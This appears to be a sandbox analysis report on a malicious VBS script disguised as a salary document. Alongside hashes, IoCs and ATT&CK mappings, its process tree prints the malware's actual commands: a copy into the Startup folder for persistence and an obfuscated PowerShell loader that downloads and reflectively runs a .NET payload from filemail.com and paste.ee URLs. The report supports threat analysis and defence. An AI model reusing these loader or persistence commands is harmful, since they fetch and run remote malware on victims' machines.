ae31154dbcca94d6ef4c0fc616d2935bb75124b4d554d3e681740986a21c1f3b

General

Target

2024 New Salary Structure.vbs
Size

1KB
MD5

98dd05c55887724be8c28776218bad24
SHA1

b8939b327872d567398b5cd508b64f831e4d4883
SHA256

ae31154dbcca94d6ef4c0fc616d2935bb75124b4d554d3e681740986a21c1f3b
SHA512

a9c178f38fb232e2b1b8d36b177fe59e8d90803e3a72e7f902217ed521381539b9cc7ccdd367bf080920fe100b7bb1b7c3a203c68fe3cb7fbbf53132b0f31206

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2296	WScript.exe
4	2296	WScript.exe
8	592	powershell.exe
9	592	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2708	powershell.exe
2232	powershell.exe
592	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1908	PING.EXE
2744	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1908	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2708	powershell.exe
2232	powershell.exe
592	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2296 wrote to memory of 2744	2296	WScript.exe	30
PID 2296 wrote to memory of 2744	2296	WScript.exe	30
PID 2296 wrote to memory of 2744	2296	WScript.exe	30
PID 2744 wrote to memory of 1908	2744	cmd.exe	32
PID 2744 wrote to memory of 1908	2744	cmd.exe	32
PID 2744 wrote to memory of 1908	2744	cmd.exe	32
PID 2744 wrote to memory of 2708	2744	cmd.exe	34
PID 2744 wrote to memory of 2708	2744	cmd.exe	34
PID 2744 wrote to memory of 2708	2744	cmd.exe	34
PID 2296 wrote to memory of 2232	2296	WScript.exe	35
PID 2296 wrote to memory of 2232	2296	WScript.exe	35
PID 2296 wrote to memory of 2232	2296	WScript.exe	35
PID 2232 wrote to memory of 592	2232	powershell.exe	37
PID 2232 wrote to memory of 592	2232	powershell.exe	37
PID 2232 wrote to memory of 592	2232	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs"
1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzakd6aW1hZ2VVcmwgPSBUVWlodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2EnKydwaS9maWwnKydlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3MnKydkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmJysncGsnKydfdmlkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIFRVaTtzakd6d2ViQ2xpJysnZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtzakd6aW1hZ2VCeXRlcyA9IHNqR3p3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKHNqR3ppbWFnZVVybCk7c2pHemltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURicrJzguR2V0U3RyaW5nKHNqR3ppbWFnZUJ5dGVzKTtzakd6c3RhcnRGbGFnID0gVFVpPDxCQVNFNjRfU1RBUlQ+PlRVaTtzakd6ZW5kRmxhZyAnKyc9IFRVaTw8QkFTRTY0XycrJ0VORD4+VFVpO3NqR3pzdGFydEluZGV4ID0gc2pHemltJysnYWdlVGV4dC5JJysnbmRleE9mKHNqR3pzdGFydEZsYWcpO3NqR3plbmRJbmRleCA9IHNqRycrJ3ppbWFnZVRleHQuSW5kZXhPZihzakd6ZW5kRmxhZyk7c2pHenN0YXJ0SW5kZXgnKycgLWdlIDAgLWFuZCBzakd6ZW5kSW5kZXggLWd0IHNqR3pzdGEnKydydEluZGV4O3NqR3pzdGFydCcrJ0luZGV4ICs9ICcrJ3NqR3onKydzdGFydEZsYWcuTGVuZ3RoO3NqJysnR3piYXNlNjRMZW5ndGggPSBzakd6ZW5kSW5kZXggLSBzakd6c3RhcnRJbmRlJysneDtzakd6YmFzZTY0Q29tbWFuZCA9IHNqR3onKydpbWFnZVRleHQuU3Vic3RyaW5nKHNqR3pzdGFydEluZGV4LCBzakd6YmFzZTY0TGVuZ3RoKTtzakd6YmFzZTY0UmV2ZXJzJysnZWQgPSAtam9pJysnbiAoc2pHemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBiVmh4IEYnKydvckVhY2gtT2JqZWN0IHsgc2pHel8gfSlbLTEuLi0oc2pHemJhc2U2NENvbW1hbmQuTGVuZ3RoKV07c2pHemNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OicrJ0Zyb21CYXMnKydlNjRTdHJpbmcocycrJ2pHemJhc2UnKyc2NFJldmVyc2VkKTtzakd6bG9hZGVkQXNzZW1ibHkgJysnPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHNqR3pjb21tYW5kQnl0ZXMpO3NqR3p2YWlNZXRob2QgPSBbZG5saWIuSU8uSG8nKydtZV0uR2V0TWV0aG9kKFRVaVZBSScrJ1RVaSk7c2pHenZhaU1ldGhvZC5JbnZva2Uoc2pHem51bCcrJ2wsIEAoVFVpMC9ZRWVuTy9kLycrJ2VlLmV0c2FwLy86c3B0dGhUVWksJysnIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaU1TQnVpbGRUVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksJysnVFVpZGVzYXRpdmFkJysnb1RVaSxUVWlkZXNhdGl2YWRvVCcrJ1VpLFRVaWRlc2F0aXZhZG9UVWksVFVpZGVzYXRpdmFkb1RVJysnaSwnKydUVWlkZXNhdGl2YWRvJysnVFVpLFQnKydVaTFUVWksVFVpZGVzYXRpdmFkb1RVaSkpOycpLnJlcExhY0UoKFtjSEFyXTExNStbY0hBcl0xMDYrW2NIQXJdNzErW2NIQXJdMTIyKSxbU3RyaU5nXVtjSEFyXTM2KS5yZXBMYWNFKChbY0hBcl05OCtbY0hBcl04NitbY0hBcl0xMDQrW2NIQXJdMTIwKSxbU3RyaU5nXVtjSEFyXTEyNCkucmVwTGFjRSgoW2NIQXJdODQrW2NIQXJdODUrW2NIQXJdMTA1KSxbU3RyaU5nXVtjSEFyXTM5KSB8IC4oICR2ZVJCb3NFUHJFRmVSRU5jRS5UT3NUcmlOZygpWzEsM10rJ3gnLUpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sjGzimageUrl = TUihttps://1017.filemail.com/a'+'pi/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgs'+'d9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&'+'pk'+'_vid=fd4f614bb209c62c1730945176a0904f TUi;sjGzwebCli'+'ent = New-Object System.Net.WebClient;sjGzimageBytes = sjGzwebClient.'+'DownloadData(sjGzimageUrl);sjGzimageText = [System.Text.Encoding]::UTF'+'8.GetString(sjGzimageBytes);sjGzstartFlag = TUi<<BASE64_START>>TUi;sjGzendFlag '+'= TUi<<BASE64_'+'END>>TUi;sjGzstartIndex = sjGzim'+'ageText.I'+'ndexOf(sjGzstartFlag);sjGzendIndex = sjG'+'zimageText.IndexOf(sjGzendFlag);sjGzstartIndex'+' -ge 0 -and sjGzendIndex -gt sjGzsta'+'rtIndex;sjGzstart'+'Index += '+'sjGz'+'startFlag.Length;sj'+'Gzbase64Length = sjGzendIndex - sjGzstartInde'+'x;sjGzbase64Command = sjGz'+'imageText.Substring(sjGzstartIndex, sjGzbase64Length);sjGzbase64Revers'+'ed = -joi'+'n (sjGzbase64Command.ToCharArray() bVhx F'+'orEach-Object { sjGz_ })[-1..-(sjGzbase64Command.Length)];sjGzcommandBytes = [System.Convert]::'+'FromBas'+'e64String(s'+'jGzbase'+'64Reversed);sjGzloadedAssembly '+'= [System.Reflection.Assembly]::Load(sjGzcommandBytes);sjGzvaiMethod = [dnlib.IO.Ho'+'me].GetMethod(TUiVAI'+'TUi);sjGzvaiMethod.Invoke(sjGznul'+'l, @(TUi0/YEenO/d/'+'ee.etsap//:sptthTUi,'+' TUidesativadoTUi, TUidesativadoTUi, TUidesativadoTUi, TUiMSBuildTUi, TUidesativadoTUi, TUidesativadoTUi,'+'TUidesativad'+'oTUi,TUidesativadoT'+'Ui,TUidesativadoTUi,TUidesativadoTU'+'i,'+'TUidesativado'+'TUi,T'+'Ui1TUi,TUidesativadoTUi));').repLacE(([cHAr]115+[cHAr]106+[cHAr]71+[cHAr]122),[StriNg][cHAr]36).repLacE(([cHAr]98+[cHAr]86+[cHAr]104+[cHAr]120),[StriNg][cHAr]124).repLacE(([cHAr]84+[cHAr]85+[cHAr]105),[StriNg][cHAr]39) | .( $veRBosEPrEFeRENcE.TOsTriNg()[1,3]+'x'-Join'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q1ECZ6RULGT0A4PWRC9X.temp

Filesize
7KB

MD5
aba490af106f83b3b42f7307dff602d8

SHA1
7a0b9abe4096fffd2ec3dd178d3b599425e3d751

SHA256
bc3a006623100c572bb2304b9a99f92f0a315be84c6f6881312f0822ad5a7f18

SHA512
bad40c21c2bfc2f8aad10cdfb7f81f8842c83d8cca5b0af909477f03dbb73ee626ef766db80e6e4633afab36ae8c87592b13f3cd50847503099f4c68675b8c9e

Download Submit
memory/2232-20-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2232-19-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2708-10-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-7-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2708-12-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-13-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-11-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-5-0x000007FEF580E000-0x000007FEF580F000-memory.dmp

Filesize
4KB

Download
memory/2708-9-0x000007FEF5550000-0x000007FEF5EED000-memory.dmp

Filesize
9.6MB

Download
memory/2708-6-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing